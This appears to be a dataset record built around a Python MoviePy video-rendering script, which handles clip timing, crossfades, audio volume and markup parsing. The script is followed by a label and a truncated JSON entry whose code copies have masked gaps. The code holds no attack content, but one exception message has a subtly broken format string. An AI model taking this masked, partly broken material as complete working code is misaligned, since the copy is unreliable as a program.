duration = max(duration, coreapi.pos_dict["re"] - clip_info.start)
prev_clip_info.duration = duration
prev_clip_info.auto_extend = False
if prev_clip_info.crossfade > 0:
prev_clip_info.fadeout = prev_clip_info.crossfade
def _export_video(*, resolution, audio_only):
resolution = [int(x * coreapi.global_scale) for x in resolution]
audio_clips = []
# Update clip duration for each track
for track in datastruct.video_tracks.values():
_update_clip_duration(track)
# TODO: post-process video track clips
# Update MoviePy clip object in each track.
video_clips = []
for track_name, track in datastruct.video_tracks.items():
for i, clip_info in enumerate(track):
assert clip_info.mpy_clip is not None
assert clip_info.duration is not None
# Unlink audio clip from video clip (adjust audio duration)
if clip_info.no_audio:
clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)
elif clip_info.mpy_clip.audio is not None:
audio_clip = clip_info.mpy_clip.audio
clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)
# Audio timing
# TODO: audio subclip
if clip_info.subclip is not None:
duration = clip_info.subclip[1] - clip_info.subclip[0]
audio_clip = audio_clip.subclip(
clip_info.subclip[0], clip_info.subclip[1]
)
else:
duration = clip_info.duration
duration = min(duration, audio_clip.duration)
audio_clip = audio_clip.set_duration(duration)
audio_clip = audio_clip.set_start(clip_info.start)
# Adjust volume
if clip_info.norm:
audio_clip = audio_clip.fx(
# pylint: disable=maybe-no-member
afx.audio_normalize
)
if clip_info.vol is not None:
if isinstance(clip_info.vol, (int, float)):
audio_clip = audio_clip.fx(
# pylint: disable=maybe-no-member
afx.volumex,
clip_info.vol,
)
else:
audio_clip = _adjust_mpy_audio_clip_volume(
audio_clip, clip_info.vol
)
audio_clips.append(audio_clip)
# If the next clip has crossfade enabled
crossfade_duration = track[i + 1].crossfade if (i < len(track) - 1) else 0
if crossfade_duration:
# clip_info.fadeout = crossfade_duration # Fadeout current clip
clip_info.duration += crossfade_duration
clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **vars(clip_info))
# Deal with video fade in / out / crossfade
if clip_info.fadein:
assert isinstance(clip_info.fadein, (int, float))
# TODO: crossfadein and crossfadeout is very slow in moviepy
if track_name != "vid":
clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(
clip_info.fadein
)
else:
clip_info.mpy_clip = clip_info.mpy_clip.fx(
# pylint: disable=maybe-no-member
vfx.fadein,
clip_info.fadein,
)
elif (
clip_info.crossfade > 0
): # crossfade and fadein should not happen at the same time
video_clips.append(
clip_info.mpy_clip.set_duration(clip_info.crossfade)
.crossfadein(clip_info.crossfade)
.set_start(clip_info.start)
)
clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.crossfade)
clip_info.start += clip_info.crossfade
if clip_info.fadeout:
assert isinstance(clip_info.fadeout, (int, float))
if track_name != "vid":
# pylint: disable=maybe-no-member
clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(
clip_info.fadeout
)
else:
clip_info.mpy_clip = clip_info.mpy_clip.fx(
# pylint: disable=maybe-no-member
vfx.fadeout,
clip_info.fadeout,
)
video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))
if len(video_clips) == 0:
video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).set_duration(2))
# raise Exception("no video clips??")
final_clip = CompositeVideoClip(video_clips, size=resolution)
# Resize here is too late, does not speed up the video encoding at all.
# final_clip = final_clip.resize(width=480)
# Deal with audio clips
for _, track in datastruct.audio_tracks.items():
clips = []
for clip_info in track.clips:
if clip_info.loop:
# HACK: reload the clip.
#
# still don't know why using loaded mpy_clip directly will cause
# "IndexError: index -200001 is out of bounds for axis 0 with
# size 0"...
clip = AudioFileClip(clip_info.file, buffersize=400000)
else:
clip = clip_info.mpy_clip
if clip_info.subclip is not None:
clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])
duration = clip_info.duration
if duration is not None:
if clip_info.loop:
# pylint: disable=maybe-no-member
clip = clip.fx(afx.audio_loop, duration=duration)
else:
duration = min(duration, clip.duration)
if clip_info.subclip:
duration = min(
duration, clip_info.subclip[1] - clip_info.subclip[0]
)
clip = clip.set_duration(duration)
if clip_info.start is not None:
clip = clip.set_start(clip_info.start)
# Adjust volume by keypoints
if len(clip_info.vol_keypoints) > 0:
clip = _adjust_mpy_audio_clip_volume(clip, clip_info.vol_keypoints)
clips.append(clip)
if len(clips) > 0:
clip = CompositeAudioClip(clips)
audio_clips.append(clip)
if final_clip.audio:
audio_clips.append(final_clip.audio)
if len(audio_clips) > 0:
final_audio_clip = CompositeAudioClip(audio_clips)
# XXX: Workaround for exception: 'CompositeAudioClip' object has no attribute 'fps'.
# See: https://github.com/Zulko/moviepy/issues/863
# final_audio_clip.fps = 44100
final_clip = final_clip.set_audio(final_audio_clip)
# final_clip.show(10.5, interactive=True)
os.makedirs("tmp/out", exist_ok=True)
if audio_only:
final_audio_clip.fps = 44100
final_audio_clip.write_audiofile("%s.mp3" % out_filename)
open_with("%s.mp3" % out_filename, program_id=0)
else:
final_clip.write_videofile(
"%s.mp4" % out_filename,
temp_audiofile="%s.mp3" % out_filename,
remove_temp=False,
codec="libx264",
threads=8,
fps=coreapi.FPS,
ffmpeg_params=["-crf", "19"],
)
subprocess.Popen(
["mpv", "--force-window", "--geometry=1920x1080", f"{out_filename}.mp4"],
close_fds=True,
)
def _adjust_mpy_audio_clip_volume(clip, vol_keypoints):
xp = []
fp = []
print("vol_keypoints:", vol_keypoints)
for (p, vol) in vol_keypoints:
if isinstance(vol, (int, float)):
xp.append(p)
fp.append(vol)
else:
raise Exception("unsupported bgm parameter type:" % type(vol))
def volume_adjust(gf, t):
factor = np.interp(t, xp, fp)
factor = np.vstack([factor, factor]).T
return factor * gf(t)
return clip.fl(volume_adjust)
# def _export_srt():
# with open("out.srt", "w", encoding="utf-8") as f:
# f.write("\n".join(_srt_lines))
def _convert_to_readable_time(seconds):
seconds = int(seconds)
seconds = seconds % (24 * 3600)
hour = seconds // 3600
seconds %= 3600
minutes = seconds // 60
seconds %= 60
if hour > 0:
return "%d:%02d:%02d" % (hour, minutes, seconds)
else:
return "%02d:%02d" % (minutes, seconds)
def _write_timestamp(t, section_name):
os.makedirs(os.path.dirname(out_filename), exist_ok=True)
if not hasattr(_write_timestamp, "f"):
_write_timestamp.f = open("%s.txt" % out_filename, "w", encoding="utf-8")
_write_timestamp.f.write("%s (%s)\n" % (section_name, _convert_to_readable_time(t)))
_write_timestamp.f.flush()
@core.api
def include(file):
with open(file, "r", encoding="utf-8") as f:
s = f.read()
cwd = os.getcwd()
os.chdir(os.path.dirname(os.path.abspath(file)))
_parse_text(s)
os.chdir(cwd)
def _remove_unused_recordings(s):
used_recordings = set()
unused_recordings = []
apis = {"record": (lambda f, **kargs: used_recordings.add(f))}
_parse_text(s, apis=apis)
files = [f for f in glob.glob("record/*") if os.path.isfile(f)]
files = [f.replace("\\", "/") for f in files]
for f in files:
if f not in used_recordings:
unused_recordings.append(f)
print2("Used : %d" % len(used_recordings), color="green")
print2("Unused : %d" % len(unused_recordings), color="red")
assert len(used_recordings) + len(unused_recordings) == len(files)
print("Press y to clean up: ", end="", flush=True)
if getch() == "y":
for f in unused_recordings:
try:
os.remove(f)
except:
print("WARNING: failed to remove: %s" % f)
def _parse_text(text, apis=core.apis, **kwargs):
def find_next(text, needle, p):
pos = text.find(needle, p)
if pos < 0:
pos = len(text)
return pos
# Remove all comments
text = re.sub(r"<!--[\d\D]*?-->", "", text)
p = 0 # Current position
while p < len(text):
if text[p : p + 2] == "{{":
end = find_next(text, "}}", p)
python_code = text[p + 2 : end].strip()
p = end + 2
if ignore_undefined:
try:
exec(python_code, apis)
except NameError: # API is not defined
pass # simply ignore
else:
exec(python_code, apis)
continue
if text[p : p + 1] == "#":
end = find_next(text, "\n", p)
line = text[p:end].strip()
_write_timestamp(coreapi.pos_dict["a"], line)
p = end + 1
continue
match = re.match("---((?:[0-9]*[.])?[0-9]+)?\n", text[p:])
if match is not None:
if match.group(1) is not None:
coreapi.audio_gap(float(match.group(1)))
else:
coreapi.audio_gap(0.2)
p += match.end(0) + 1
continue
# Parse regular text
end = find_next(text, "\n", p)
line = text[p:end].strip()
p = end + 1
if line != "" and "parse_line" in apis:
apis["parse_line"](line)
# Call it at the end
core.on_api_func(None)
def _show_stats(s):
TIME_PER_CHAR = 0.1334154351395731
total = 0
def parse_line(line):
nonlocal total
total += len(line)
_parse_text(s, apis={"parse_line": parse_line}, ignore_undefined=True)
total_secs = TIME_PER_CHAR * total
print("Estimated Time: %s" % format_time(total_secs))
input()
def load_config():
import yaml
CONFIG_FILE = "config.yaml"
DEFAULT_CONFIG = {"fps": 30}
if os.path.exists(CONFIG_FILE):
with open(CONFIG_FILE, "r") as f:
config = yaml.load(f.read(), Loader=yaml.FullLoader)
else:
with open(CONFIG_FILE, "w", newline="\n") as f:
yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)
config = DEFAULT_CONFIG
coreapi.fps(config["fps"])
if __name__ == "__main__":
out_filename = "tmp/out/" + get_time_str()
parser = argparse.ArgumentParser()
parser.add_argument("--stdin", default=False, action="store_true")
parser.add_argument("--proj_dir", type=str, default=None)
parser.add_argument("-i", "--input", type=str, default=None)
parser.add_argument("-a", "--audio_only", action="store_true", default=False)
parser.add_argument(
"--remove_unused_recordings", action="store_true", default=False
)
parser.add_argument("--show_stats", action="store_true", default=False)
parser.add_argument("--preview", action="store_true", default=False)
args = parser.parse_args()
if args.proj_dir is not None:
os.chdir(args.proj_dir)
elif args.input:
os.chdir(os.path.dirname(args.input))
print("Project dir: %s" % os.getcwd())
# Load custom APIs (api.py) if exists
if os.path.exists("api.py"):
sys.path.append(os.getcwd())
mymodule = importlib.import_module("api")
global_functions = inspect.getmembers(mymodule, inspect.isfunction)
core.apis.update({k: v for k, v in global_functions})
# HACK
if args.audio_only:
coreapi.audio_only()
# Read text
if args.stdin:
s = sys.stdin.read()
elif args.input:
with open(args.input, "r", encoding="utf-8") as f:
s = f.read()
else:
raise Exception("Either --stdin or --input should be specified.")
load_config()
if args.preview:
coreapi.preview()
if args.remove_unused_recordings:
ignore_undefined = True
_remove_unused_recordings(s)
elif args.show_stats:
ignore_undefined = True
_show_stats(s)
else:
_parse_text(s, apis=core.apis)
_export_video(resolution=(1920, 1080), audio_only=args.audio_only)
|
normal
|
{
"blob_id": "9e21a39358d97633b49ad83805990c29c19a80ed",
"index": 8599,
"step-1": "<mask token>\n\n\ndef _update_mpy_clip(clip, subclip, speed, frame, norm, loop, duration, pos,\n scale, vol, **kwargs):\n assert duration is not None\n if subclip is not None:\n if isinstance(subclip, (int, float)):\n clip = clip.subclip(subclip).set_duration(duration)\n else:\n subclip_duration = subclip[1] - subclip[0]\n if duration > subclip_duration:\n c1 = clip.subclip(subclip[0], subclip[1])\n c2 = clip.to_ImageClip(subclip[1]).set_duration(duration -\n subclip_duration)\n clip = concatenate_videoclips([c1, c2])\n if clip.audio is not None:\n clip = clip.set_audio(clip.audio.set_fps(44100))\n else:\n clip = clip.subclip(subclip[0], subclip[1]).set_duration(\n duration)\n if speed is not None:\n clip = clip.fx(vfx.speedx, speed)\n if frame is not None:\n clip = clip.to_ImageClip(frame).set_duration(duration)\n if loop:\n clip = clip.fx(vfx.loop)\n if subclip is None:\n clip = clip.set_duration(duration)\n if pos is not None:\n if pos == 'center':\n clip = clip.set_position(('center', 'center'))\n elif isinstance(pos, (list, tuple)):\n pos = list(pos)\n half_size = [(x // 2) for x in clip.size]\n for i in range(2):\n if isinstance(pos[i], (int, float)):\n pos[i] = pos[i] - half_size[i]\n pos[i] = int(coreapi.global_scale * pos[i])\n clip = clip.set_position(pos)\n else:\n clip = clip.set_position(pos)\n if scale[0] != 1.0 or scale[1] != 1.0:\n clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))\n return clip\n\n\ndef _update_clip_duration(track):\n\n def is_connected(prev_clip, cur_clip):\n return math.isclose(prev_clip.start + prev_clip.duration, cur_clip.\n start, rel_tol=0.001)\n prev_clip_info = None\n for clip_info in track:\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n prev_clip_info.duration = (clip_info.start - prev_clip_info\n .start)\n prev_clip_info.auto_extend = False\n assert prev_clip_info.duration > 0\n if prev_clip_info.crossfade > 0 and not is_connected(prev_clip_info\n , clip_info):\n 
prev_clip_info.fadeout = prev_clip_info.crossfade\n prev_clip_info = clip_info\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n duration = prev_clip_info.duration\n if 're' in coreapi.pos_dict:\n duration = max(duration, coreapi.pos_dict['re'] - clip_info\n .start)\n prev_clip_info.duration = duration\n prev_clip_info.auto_extend = False\n if prev_clip_info.crossfade > 0:\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n\ndef _export_video(*, resolution, audio_only):\n resolution = [int(x * coreapi.global_scale) for x in resolution]\n audio_clips = []\n for track in datastruct.video_tracks.values():\n _update_clip_duration(track)\n video_clips = []\n for track_name, track in datastruct.video_tracks.items():\n for i, clip_info in enumerate(track):\n assert clip_info.mpy_clip is not None\n assert clip_info.duration is not None\n if clip_info.no_audio:\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n elif clip_info.mpy_clip.audio is not None:\n audio_clip = clip_info.mpy_clip.audio\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n if clip_info.subclip is not None:\n duration = clip_info.subclip[1] - clip_info.subclip[0]\n audio_clip = audio_clip.subclip(clip_info.subclip[0],\n clip_info.subclip[1])\n else:\n duration = clip_info.duration\n duration = min(duration, audio_clip.duration)\n audio_clip = audio_clip.set_duration(duration)\n audio_clip = audio_clip.set_start(clip_info.start)\n if clip_info.norm:\n audio_clip = audio_clip.fx(afx.audio_normalize)\n if clip_info.vol is not None:\n if isinstance(clip_info.vol, (int, float)):\n audio_clip = audio_clip.fx(afx.volumex, clip_info.vol)\n else:\n audio_clip = _adjust_mpy_audio_clip_volume(audio_clip,\n clip_info.vol)\n audio_clips.append(audio_clip)\n crossfade_duration = track[i + 1].crossfade if i < len(track\n ) - 1 else 0\n if crossfade_duration:\n clip_info.duration += crossfade_duration\n clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **\n 
vars(clip_info))\n if clip_info.fadein:\n assert isinstance(clip_info.fadein, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(\n clip_info.fadein)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadein,\n clip_info.fadein)\n elif clip_info.crossfade > 0:\n video_clips.append(clip_info.mpy_clip.set_duration(\n clip_info.crossfade).crossfadein(clip_info.crossfade).\n set_start(clip_info.start))\n clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.\n crossfade)\n clip_info.start += clip_info.crossfade\n if clip_info.fadeout:\n assert isinstance(clip_info.fadeout, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(\n clip_info.fadeout)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadeout,\n clip_info.fadeout)\n video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))\n if len(video_clips) == 0:\n video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).\n set_duration(2))\n final_clip = CompositeVideoClip(video_clips, size=resolution)\n for _, track in datastruct.audio_tracks.items():\n clips = []\n for clip_info in track.clips:\n if clip_info.loop:\n clip = AudioFileClip(clip_info.file, buffersize=400000)\n else:\n clip = clip_info.mpy_clip\n if clip_info.subclip is not None:\n clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])\n duration = clip_info.duration\n if duration is not None:\n if clip_info.loop:\n clip = clip.fx(afx.audio_loop, duration=duration)\n else:\n duration = min(duration, clip.duration)\n if clip_info.subclip:\n duration = min(duration, clip_info.subclip[1] -\n clip_info.subclip[0])\n clip = clip.set_duration(duration)\n if clip_info.start is not None:\n clip = clip.set_start(clip_info.start)\n if len(clip_info.vol_keypoints) > 0:\n clip = _adjust_mpy_audio_clip_volume(clip, clip_info.\n vol_keypoints)\n clips.append(clip)\n if len(clips) > 0:\n clip = CompositeAudioClip(clips)\n audio_clips.append(clip)\n if 
final_clip.audio:\n audio_clips.append(final_clip.audio)\n if len(audio_clips) > 0:\n final_audio_clip = CompositeAudioClip(audio_clips)\n final_clip = final_clip.set_audio(final_audio_clip)\n os.makedirs('tmp/out', exist_ok=True)\n if audio_only:\n final_audio_clip.fps = 44100\n final_audio_clip.write_audiofile('%s.mp3' % out_filename)\n open_with('%s.mp3' % out_filename, program_id=0)\n else:\n final_clip.write_videofile('%s.mp4' % out_filename, temp_audiofile=\n '%s.mp3' % out_filename, remove_temp=False, codec='libx264',\n threads=8, fps=coreapi.FPS, ffmpeg_params=['-crf', '19'])\n subprocess.Popen(['mpv', '--force-window', '--geometry=1920x1080',\n f'{out_filename}.mp4'], close_fds=True)\n\n\n<mask token>\n\n\ndef _convert_to_readable_time(seconds):\n seconds = int(seconds)\n seconds = seconds % (24 * 3600)\n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n if hour > 0:\n return '%d:%02d:%02d' % (hour, minutes, seconds)\n else:\n return '%02d:%02d' % (minutes, seconds)\n\n\n<mask token>\n\n\n@core.api\ndef include(file):\n with open(file, 'r', encoding='utf-8') as f:\n s = f.read()\n cwd = os.getcwd()\n os.chdir(os.path.dirname(os.path.abspath(file)))\n _parse_text(s)\n os.chdir(cwd)\n\n\ndef _remove_unused_recordings(s):\n used_recordings = set()\n unused_recordings = []\n apis = {'record': lambda f, **kargs: used_recordings.add(f)}\n _parse_text(s, apis=apis)\n files = [f for f in glob.glob('record/*') if os.path.isfile(f)]\n files = [f.replace('\\\\', '/') for f in files]\n for f in files:\n if f not in used_recordings:\n unused_recordings.append(f)\n print2('Used : %d' % len(used_recordings), color='green')\n print2('Unused : %d' % len(unused_recordings), color='red')\n assert len(used_recordings) + len(unused_recordings) == len(files)\n print('Press y to clean up: ', end='', flush=True)\n if getch() == 'y':\n for f in unused_recordings:\n try:\n os.remove(f)\n except:\n print('WARNING: failed to remove: %s' % 
f)\n\n\ndef _parse_text(text, apis=core.apis, **kwargs):\n\n def find_next(text, needle, p):\n pos = text.find(needle, p)\n if pos < 0:\n pos = len(text)\n return pos\n text = re.sub('<!--[\\\\d\\\\D]*?-->', '', text)\n p = 0\n while p < len(text):\n if text[p:p + 2] == '{{':\n end = find_next(text, '}}', p)\n python_code = text[p + 2:end].strip()\n p = end + 2\n if ignore_undefined:\n try:\n exec(python_code, apis)\n except NameError:\n pass\n else:\n exec(python_code, apis)\n continue\n if text[p:p + 1] == '#':\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n _write_timestamp(coreapi.pos_dict['a'], line)\n p = end + 1\n continue\n match = re.match('---((?:[0-9]*[.])?[0-9]+)?\\n', text[p:])\n if match is not None:\n if match.group(1) is not None:\n coreapi.audio_gap(float(match.group(1)))\n else:\n coreapi.audio_gap(0.2)\n p += match.end(0) + 1\n continue\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n p = end + 1\n if line != '' and 'parse_line' in apis:\n apis['parse_line'](line)\n core.on_api_func(None)\n\n\n<mask token>\n\n\ndef load_config():\n import yaml\n CONFIG_FILE = 'config.yaml'\n DEFAULT_CONFIG = {'fps': 30}\n if os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, 'r') as f:\n config = yaml.load(f.read(), Loader=yaml.FullLoader)\n else:\n with open(CONFIG_FILE, 'w', newline='\\n') as f:\n yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)\n config = DEFAULT_CONFIG\n coreapi.fps(config['fps'])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef _update_mpy_clip(clip, subclip, speed, frame, norm, loop, duration, pos,\n scale, vol, **kwargs):\n assert duration is not None\n if subclip is not None:\n if isinstance(subclip, (int, float)):\n clip = clip.subclip(subclip).set_duration(duration)\n else:\n subclip_duration = subclip[1] - subclip[0]\n if duration > subclip_duration:\n c1 = clip.subclip(subclip[0], subclip[1])\n c2 = clip.to_ImageClip(subclip[1]).set_duration(duration -\n subclip_duration)\n clip = concatenate_videoclips([c1, c2])\n if clip.audio is not None:\n clip = clip.set_audio(clip.audio.set_fps(44100))\n else:\n clip = clip.subclip(subclip[0], subclip[1]).set_duration(\n duration)\n if speed is not None:\n clip = clip.fx(vfx.speedx, speed)\n if frame is not None:\n clip = clip.to_ImageClip(frame).set_duration(duration)\n if loop:\n clip = clip.fx(vfx.loop)\n if subclip is None:\n clip = clip.set_duration(duration)\n if pos is not None:\n if pos == 'center':\n clip = clip.set_position(('center', 'center'))\n elif isinstance(pos, (list, tuple)):\n pos = list(pos)\n half_size = [(x // 2) for x in clip.size]\n for i in range(2):\n if isinstance(pos[i], (int, float)):\n pos[i] = pos[i] - half_size[i]\n pos[i] = int(coreapi.global_scale * pos[i])\n clip = clip.set_position(pos)\n else:\n clip = clip.set_position(pos)\n if scale[0] != 1.0 or scale[1] != 1.0:\n clip = clip.resize((int(clip.w * scale[0]), int(clip.h * scale[1])))\n return clip\n\n\ndef _update_clip_duration(track):\n\n def is_connected(prev_clip, cur_clip):\n return math.isclose(prev_clip.start + prev_clip.duration, cur_clip.\n start, rel_tol=0.001)\n prev_clip_info = None\n for clip_info in track:\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n prev_clip_info.duration = (clip_info.start - prev_clip_info\n .start)\n prev_clip_info.auto_extend = False\n assert prev_clip_info.duration > 0\n if prev_clip_info.crossfade > 0 and not is_connected(prev_clip_info\n , clip_info):\n 
prev_clip_info.fadeout = prev_clip_info.crossfade\n prev_clip_info = clip_info\n if prev_clip_info is not None:\n if prev_clip_info.auto_extend:\n duration = prev_clip_info.duration\n if 're' in coreapi.pos_dict:\n duration = max(duration, coreapi.pos_dict['re'] - clip_info\n .start)\n prev_clip_info.duration = duration\n prev_clip_info.auto_extend = False\n if prev_clip_info.crossfade > 0:\n prev_clip_info.fadeout = prev_clip_info.crossfade\n\n\ndef _export_video(*, resolution, audio_only):\n resolution = [int(x * coreapi.global_scale) for x in resolution]\n audio_clips = []\n for track in datastruct.video_tracks.values():\n _update_clip_duration(track)\n video_clips = []\n for track_name, track in datastruct.video_tracks.items():\n for i, clip_info in enumerate(track):\n assert clip_info.mpy_clip is not None\n assert clip_info.duration is not None\n if clip_info.no_audio:\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n elif clip_info.mpy_clip.audio is not None:\n audio_clip = clip_info.mpy_clip.audio\n clip_info.mpy_clip = clip_info.mpy_clip.set_audio(None)\n if clip_info.subclip is not None:\n duration = clip_info.subclip[1] - clip_info.subclip[0]\n audio_clip = audio_clip.subclip(clip_info.subclip[0],\n clip_info.subclip[1])\n else:\n duration = clip_info.duration\n duration = min(duration, audio_clip.duration)\n audio_clip = audio_clip.set_duration(duration)\n audio_clip = audio_clip.set_start(clip_info.start)\n if clip_info.norm:\n audio_clip = audio_clip.fx(afx.audio_normalize)\n if clip_info.vol is not None:\n if isinstance(clip_info.vol, (int, float)):\n audio_clip = audio_clip.fx(afx.volumex, clip_info.vol)\n else:\n audio_clip = _adjust_mpy_audio_clip_volume(audio_clip,\n clip_info.vol)\n audio_clips.append(audio_clip)\n crossfade_duration = track[i + 1].crossfade if i < len(track\n ) - 1 else 0\n if crossfade_duration:\n clip_info.duration += crossfade_duration\n clip_info.mpy_clip = _update_mpy_clip(clip_info.mpy_clip, **\n 
vars(clip_info))\n if clip_info.fadein:\n assert isinstance(clip_info.fadein, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadein(\n clip_info.fadein)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadein,\n clip_info.fadein)\n elif clip_info.crossfade > 0:\n video_clips.append(clip_info.mpy_clip.set_duration(\n clip_info.crossfade).crossfadein(clip_info.crossfade).\n set_start(clip_info.start))\n clip_info.mpy_clip = clip_info.mpy_clip.subclip(clip_info.\n crossfade)\n clip_info.start += clip_info.crossfade\n if clip_info.fadeout:\n assert isinstance(clip_info.fadeout, (int, float))\n if track_name != 'vid':\n clip_info.mpy_clip = clip_info.mpy_clip.crossfadeout(\n clip_info.fadeout)\n else:\n clip_info.mpy_clip = clip_info.mpy_clip.fx(vfx.fadeout,\n clip_info.fadeout)\n video_clips.append(clip_info.mpy_clip.set_start(clip_info.start))\n if len(video_clips) == 0:\n video_clips.append(ColorClip((200, 200), color=(0, 1, 0)).\n set_duration(2))\n final_clip = CompositeVideoClip(video_clips, size=resolution)\n for _, track in datastruct.audio_tracks.items():\n clips = []\n for clip_info in track.clips:\n if clip_info.loop:\n clip = AudioFileClip(clip_info.file, buffersize=400000)\n else:\n clip = clip_info.mpy_clip\n if clip_info.subclip is not None:\n clip = clip.subclip(clip_info.subclip[0], clip_info.subclip[1])\n duration = clip_info.duration\n if duration is not None:\n if clip_info.loop:\n clip = clip.fx(afx.audio_loop, duration=duration)\n else:\n duration = min(duration, clip.duration)\n if clip_info.subclip:\n duration = min(duration, clip_info.subclip[1] -\n clip_info.subclip[0])\n clip = clip.set_duration(duration)\n if clip_info.start is not None:\n clip = clip.set_start(clip_info.start)\n if len(clip_info.vol_keypoints) > 0:\n clip = _adjust_mpy_audio_clip_volume(clip, clip_info.\n vol_keypoints)\n clips.append(clip)\n if len(clips) > 0:\n clip = CompositeAudioClip(clips)\n audio_clips.append(clip)\n if 
final_clip.audio:\n audio_clips.append(final_clip.audio)\n if len(audio_clips) > 0:\n final_audio_clip = CompositeAudioClip(audio_clips)\n final_clip = final_clip.set_audio(final_audio_clip)\n os.makedirs('tmp/out', exist_ok=True)\n if audio_only:\n final_audio_clip.fps = 44100\n final_audio_clip.write_audiofile('%s.mp3' % out_filename)\n open_with('%s.mp3' % out_filename, program_id=0)\n else:\n final_clip.write_videofile('%s.mp4' % out_filename, temp_audiofile=\n '%s.mp3' % out_filename, remove_temp=False, codec='libx264',\n threads=8, fps=coreapi.FPS, ffmpeg_params=['-crf', '19'])\n subprocess.Popen(['mpv', '--force-window', '--geometry=1920x1080',\n f'{out_filename}.mp4'], close_fds=True)\n\n\ndef _adjust_mpy_audio_clip_volume(clip, vol_keypoints):\n xp = []\n fp = []\n print('vol_keypoints:', vol_keypoints)\n for p, vol in vol_keypoints:\n if isinstance(vol, (int, float)):\n xp.append(p)\n fp.append(vol)\n else:\n raise Exception('unsupported bgm parameter type:' % type(vol))\n\n def volume_adjust(gf, t):\n factor = np.interp(t, xp, fp)\n factor = np.vstack([factor, factor]).T\n return factor * gf(t)\n return clip.fl(volume_adjust)\n\n\ndef _convert_to_readable_time(seconds):\n seconds = int(seconds)\n seconds = seconds % (24 * 3600)\n hour = seconds // 3600\n seconds %= 3600\n minutes = seconds // 60\n seconds %= 60\n if hour > 0:\n return '%d:%02d:%02d' % (hour, minutes, seconds)\n else:\n return '%02d:%02d' % (minutes, seconds)\n\n\n<mask token>\n\n\n@core.api\ndef include(file):\n with open(file, 'r', encoding='utf-8') as f:\n s = f.read()\n cwd = os.getcwd()\n os.chdir(os.path.dirname(os.path.abspath(file)))\n _parse_text(s)\n os.chdir(cwd)\n\n\ndef _remove_unused_recordings(s):\n used_recordings = set()\n unused_recordings = []\n apis = {'record': lambda f, **kargs: used_recordings.add(f)}\n _parse_text(s, apis=apis)\n files = [f for f in glob.glob('record/*') if os.path.isfile(f)]\n files = [f.replace('\\\\', '/') for f in files]\n for f in files:\n if 
f not in used_recordings:\n unused_recordings.append(f)\n print2('Used : %d' % len(used_recordings), color='green')\n print2('Unused : %d' % len(unused_recordings), color='red')\n assert len(used_recordings) + len(unused_recordings) == len(files)\n print('Press y to clean up: ', end='', flush=True)\n if getch() == 'y':\n for f in unused_recordings:\n try:\n os.remove(f)\n except:\n print('WARNING: failed to remove: %s' % f)\n\n\ndef _parse_text(text, apis=core.apis, **kwargs):\n\n def find_next(text, needle, p):\n pos = text.find(needle, p)\n if pos < 0:\n pos = len(text)\n return pos\n text = re.sub('<!--[\\\\d\\\\D]*?-->', '', text)\n p = 0\n while p < len(text):\n if text[p:p + 2] == '{{':\n end = find_next(text, '}}', p)\n python_code = text[p + 2:end].strip()\n p = end + 2\n if ignore_undefined:\n try:\n exec(python_code, apis)\n except NameError:\n pass\n else:\n exec(python_code, apis)\n continue\n if text[p:p + 1] == '#':\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n _write_timestamp(coreapi.pos_dict['a'], line)\n p = end + 1\n continue\n match = re.match('---((?:[0-9]*[.])?[0-9]+)?\\n', text[p:])\n if match is not None:\n if match.group(1) is not None:\n coreapi.audio_gap(float(match.group(1)))\n else:\n coreapi.audio_gap(0.2)\n p += match.end(0) + 1\n continue\n end = find_next(text, '\\n', p)\n line = text[p:end].strip()\n p = end + 1\n if line != '' and 'parse_line' in apis:\n apis['parse_line'](line)\n core.on_api_func(None)\n\n\n<mask token>\n\n\ndef load_config():\n import yaml\n CONFIG_FILE = 'config.yaml'\n DEFAULT_CONFIG = {'fps': 30}\n if os.path.exists(CONFIG_FILE):\n with open(CONFIG_FILE, 'r') as f:\n config = yaml.load(f.read(), Loader=yaml.FullLoader)\n else:\n with open(CONFIG_FILE, 'w', newline='\\n') as f:\n yaml.dump(DEFAULT_CONFIG, f, default_flow_style=False)\n config = DEFAULT_CONFIG\n coreapi.fps(config['fps'])\n\n\n<mask token>\n",
